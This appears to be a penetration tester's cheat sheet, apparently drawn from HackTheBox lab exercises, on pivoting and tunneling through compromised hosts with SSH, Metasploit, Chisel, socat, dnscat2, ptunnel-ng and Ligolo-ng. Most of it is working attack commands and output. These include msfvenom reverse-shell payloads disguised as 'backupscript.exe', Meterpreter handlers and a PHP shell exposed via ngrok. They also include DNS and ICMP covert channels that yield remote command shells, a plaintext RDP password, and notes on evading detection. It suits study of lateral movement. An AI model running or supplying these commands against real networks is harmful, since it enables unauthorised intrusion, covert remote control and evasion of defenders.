Pivot, Tunneling and Port Forwarding

SSH

Local port forwarding

Mysql port 3306 on victim localhost: netstat -tulpn

ssh -L 1234:localhost:3306 ubuntu@10.129.202.64

The -L command tells the SSH client to request the SSH server to forward all the data we send via the port 1234 to localhost:3306 on the Ubuntu server.

$ nmap -v -sV -p1234 localhost

PORT     STATE SERVICE VERSION
1234/tcp open  mysql   MySQL 8.0.28-0ubuntu0.20.04.3

Web server listening on localhost

user@box:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:33209         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:37285         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:43765         0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::21                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -                   
127.0.0.1:8080
ssh -L 8888:localhost:8080 user@box.htb

Forwarding multiple ports

ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64

Dynamic Port Forwarding with SSH

ssh -D 9050 ubuntu@10.129.202.64
$ tail -4 /etc/proxychains.conf

# meanwile
# defaults set to "tor"
socks4 	127.0.0.1 9050
proxychains nmap -v -sn 172.16.5.1-200

- sT

proxychains nmap -v -Pn -sT 172.16.5.19

Remote / reverse port forward

ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

Metasploit

MSF's SOCKS Proxy

msf6 > use auxiliary/server/socks_proxy

msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
SRVPORT => 9050
msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > options

Module options (auxiliary/server/socks_proxy):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  9050             yes       The port to listen on
   VERSION  4a               yes       The SOCKS version to use (Accepted: 4a,
                                        5)


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server

proxychains:

socks4 	127.0.0.1 9050

Autoroute

msf6 > use post/multi/manage/autoroute

msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
SUBNET => 172.16.5.0
msf6 post(multi/manage/autoroute) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: linux
[*] Running module against 10.129.202.64
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.129.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 172.16.5.0/255.255.254.0 from host's routing table.
[*] Post module execution completed

or

meterpreter > run autoroute -s 172.16.5.0/23

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.16.5.0/255.255.254.0...
[+] Added route to 172.16.5.0/255.255.254.0 via 10.129.202.64
[*] Use the -p option to list all active routes

Listing autoroute

meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.129.0.0         255.255.0.0        Session 1
   172.16.4.0         255.255.254.0      Session 1
   172.16.5.0         255.255.254.0      Session 1

test

 proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn

MSF local port forward

meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19

[*] Local TCP relay created: :3300 <-> 172.16.5.19:3389

The above command requests the Meterpreter session to start a listener on our attack host's local port (-l) 3300 and forward all the packets to the remote (-r) Windows server 172.16.5.19 on 3389 port (-p) via our Meterpreter session.

xfreerdp /v:localhost:3300 /u:victor /p:pass@123

Meterpreter Reverse Port Forwarding

meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

[*] Local TCP relay created: 10.10.14.18:8081 <-> :1234
meterpreter > bg

[*] Backgrounding session 1...
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 8081 
LPORT => 8081
msf6 exploit(multi/handler) > set LHOST 0.0.0.0 
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:8081

We can now create a reverse shell payload that will send a connection back to our Ubuntu server on 172.16.5.129:1234 when executed on our Windows host. Once our Ubuntu server receives this connection, it will forward that to attack host's ip:8081 that we configured.

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=1234

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: backupscript.exe
[*] Started reverse TCP handler on 0.0.0.0:8081 
[*] Sending stage (200262 bytes) to 10.10.14.18
[*] Meterpreter session 2 opened (10.10.14.18:8081 -> 10.10.14.18:40173 ) at 2022-03-04 15:26:14 -0500

meterpreter > shell
Process 2336 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\>

Resources

Proxychains

proxychains -q <cmd> : quiet mode

Nmap over proxychains: proxychains -q nmap -sT IP PORT

tun2socks

Chisel

Socks4

user@box:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -  
# ./chisel server -v -p 1234 --reverse  
user@box:/tmp$ ./chisel client 10.10.14.136:1234 R:8080:127.0.0.1:8080
# proxychains curl http://127.0.0.1:8080

proxychains not working - try without proxychains

# curl http://127.0.0.1:8080

<!DOCTYPE html>
<html lang="en" data-bs-theme="light">
<head>
<--SNIP-->

Socks5

0xss0rz@htb[/htb]$ cat /etc/proxychains.conf

<SNIP>

[ProxyList]
socks5 127.0.0.1 1080
0xss0rz@htb[/htb]$ wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz
0xss0rz@htb[/htb]$ gzip -d chisel_1.7.7_linux_amd64.gz
0xss0rz@htb[/htb]$ mv chisel_* chisel && chmod +x ./chisel
0xss0rz@htb[/htb]$ sudo ./chisel server --reverse 

2022/10/10 07:26:15 server: Reverse tunneling enabled
2022/10/10 07:26:15 server: Fingerprint 58EulHjQXAOsBRpxk232323sdLHd0r3r2nrdVYoYeVM=
2022/10/10 07:26:15 server: Listening on http://0.0.0.0:8080
C:\htb> c:\tools\chisel.exe client 10.10.14.33:8080 R:socks

2022/10/10 06:34:19 client: Connecting to ws://10.10.14.33:8080
2022/10/10 06:34:20 client: Connected (Latency 125.6177ms)

or choose an other port

./chisel server -v -p 1234 --socks5

Socat

Socat Reverse shell

On pivot host

ubuntu@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80

Socat will listen on localhost on port 8080 and forward all the traffic to port 80 on our attack host (10.10.14.18).

$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080
msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 80
lport => 80
msf6 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://0.0.0.0:80
[!] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Without a database connected that payload UUID tracking will not work!
[*] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Staging x64 payload (201308 bytes) ...
[!] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.10.14.18:80 -> 127.0.0.1 ) at 2022-03-07 11:08:10 -0500

meterpreter > getuid
Server username: INLANEFREIGHT\victor

Socat Bind shell

$ msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 499 bytes
Final size of exe file: 7168 bytes
Saved as: backupjob.exe

socat bind shell listener, which listens on port 8080 and forwards packets to Windows server 8443.

On pivot machine:

ubuntu@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443
msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set RHOST 10.129.202.64
RHOST => 10.129.202.64
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 10.129.202.64:8080
[*] Sending stage (200262 bytes) to 10.129.202.64
[*] Meterpreter session 1 opened (10.10.14.18:46253 -> 10.129.202.64:8080 ) at 2022-03-07 12:44:44 -0500

meterpreter > getuid
Server username: INLANEFREIGHT\victor

Plink

If the host is older and PuTTY is present (or we can find a copy on a file share), Plink can be our path to victory. We can use it to create our pivot and potentially avoid detection a little longer.

plink -ssh -D 9050 ubuntu@10.129.15.50

Proxifier can be used to start a SOCKS tunnel via the SSH session we created.

Portable version :

SSHuttle

removes the need to configure proxychains. However, this tool only works for pivoting over SSH and does not provide other options for pivoting

sudo apt-get install sshuttle
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v

Rpivot

sudo git clone https://github.com/klsecservices/rpivot.git
sudo apt-get install python2.7
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/

run client from pivot machine:

ubuntu@WEB01:~/rpivot$ python2.7 client.py --server-ip 10.10.14.18 --server-port 9999

HTTP proxy and NTLM auth

python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>

configure proxychains to pivot over our local server on 127.0.0.1:9050

proxychains firefox-esr 172.16.5.135:80

Netsh

C:\Windows\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
C:\Windows\system32> netsh.exe interface portproxy show v4tov4

Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.129.42.198   8080        172.16.5.25     3389

DNScat2

DNS Tunneling

$ git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
sudo gem install bundler
sudo bundle install
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache

Doesn't work on Exegol => Ubuntu

sudo apt  install ruby-dev
sudo apt install gem
sudo apt  install ruby-rubygems
export PATH="$PATH:$HOME/.rvm/bin"

Will provide us the secret key

git clone https://github.com/lukebaggett/dnscat2-powershell.git

Import dnscat to windows victim

Set-ExecutionPolicy Unrestricted
PS C:\htb> Import-Module .\dnscat2.ps1
PS C:\htb> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd 
New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)

dnscat2>
nscat2> ?

Here is a list of commands (use -h on any of them for additional help):
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows
dnscat2> window -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

Microsoft Windows [Version 10.0.18363.1801]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
exec (OFFICEMANAGER) 1>

ICMP Tunneling

git clone https://github.com/utoni/ptunnel-ng.git
sudo ./autogen.sh
scp -r ptunnel-ng ubuntu@10.129.202.64:~/
ubuntu@WEB01:~/ptunnel-ng/src$ sudo ./ptunnel-ng -r10.129.202.64 -R22

-r: attacker host

sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22
ssh -p2222 -lubuntu 127.0.0.1

Port forward:

ssh -D 9050 -p2222 -lubuntu 127.0.0.1
$ proxychains nmap -sV -sT 172.16.5.19 -p3389

ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-11 11:10 EDT
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK
Nmap scan report for 172.16.5.19
Host is up (0.12s latency).

PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds

SocksOverRDP

Copy the SocksOverRDPx64.zip on the target

Load dll

C:\Users\htb-student\Desktop\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll

Connect to 172.16.5.19 over RDP using mstsc.exe, and we should receive a prompt that the SocksOverRDP plugin is enabled, and it will listen on 127.0.0.1:1080

We will need to transfer SocksOverRDPx64.zip or just the SocksOverRDP-Server.exe to 172.16.5.19. We can then start SocksOverRDP-Server.exe with Admin privileges.

After starting our listener, we can transfer Proxifier portable to the Windows 10 target (on the 10.129.x.x network), and configure it to forward all our packets to 127.0.0.1:1080. Proxifier will route traffic through the given host and port

Profile > Proxyserver Add 127.0.0.1 port 1080 Socks version5

With Proxifier configured and running, we can start mstsc.exe, and it will use Proxifier to pivot all our traffic via 127.0.0.1:1080, which will tunnel it over RDP to 172.16.5.19, which will then route it to 172.16.6.155 using SocksOverRDP-server.exe.

Ligolo-ng - The best tool

References

Moving pivot from different hosts

[Mar 21, 2024 - 02:16:03 (EDT)] exegol-zephyr ligolo # sudo ip tuntap add user root mode tun ligolo

[Mar 21, 2024 - 02:16:15 (EDT)] exegol-zephyr ligolo # sudo ip link set ligolo up
[Mar 21, 2024 - 02:16:30 (EDT)] exegol-zephyr ligolo # scp lin-agent riley@10.10.110.35:/tmp/0xss0rz/lin-agent
riley@10.10.110.35's password: 
lin-agent                                                100% 4572KB   4.9MB/s   00:00    
[Mar 21, 2024 - 02:20:28 (EDT)] exegol-zephyr ligolo #
./lin-proxy -selfcert -laddr 0.0.0.0:443
riley@mail:/tmp/0xss0rz$ chmod +x lin-agent 
riley@mail:/tmp/0xss0rz$ ./lin-agent -connect 10.10.14.4:443 -ignore-cert
ligolo-ng » INFO[0026] Agent joined.                                 name=riley@mail remote="10.10.110.35:46489"
ligolo-ng » session
? Specify a session : 1 - #1 - riley@mail - 10.10.110.35:46489
[Agent : riley@mail] » start
[Agent : riley@mail] » INFO[0315] Starting tunnel to riley@mail
[Mar 21, 2024 - 02:25:58 (EDT)] exegol-zephyr /workspace # sudo ip route add 192.168.110.0/24 dev ligolo

Double Pivot (and more)

1st Pivot

sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
./lin-proxy -selfcert -laddr 0.0.0.0:11601
./lin-agent -connect 10.10.14.2:11601 -ignore-cert
sudo ip route add 172.16.1.0/24 dev ligolo

2nd Pivot

Create a new interface

sudo ip tuntap add user root mode tun ligolo2
sudo ip link set ligolo2 up
./lin-agent -connect 10.10.14.2:11601 -ignore-cert
start --tun ligolo2
sudo ip route add 172.16.2.0/24 dev ligolo2

3rd Pivot - the same thing (create new interface, tunnel via the new interface), if the subnet is the same, don't forget to delete old routes

sudo ip route del 172.16.2.0/24 dev ligolo2

Reverse shell - File Transfer

## Shell on pivot adress (172.16.8.120)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.8.120 LPORT=1234 -f aspx > rs.aspx 
## On ligolo, create listener to forward port
listener_add --addr 0.0.0.0:1234 --to 0.0.0.0:4444
##On host
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

Ngrock

#1
./ngrok tcp 4444

#2
msfvenom -p php/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=13757 R > hack.php
PreviousPost ExploitationNextLateral Movement

Last updated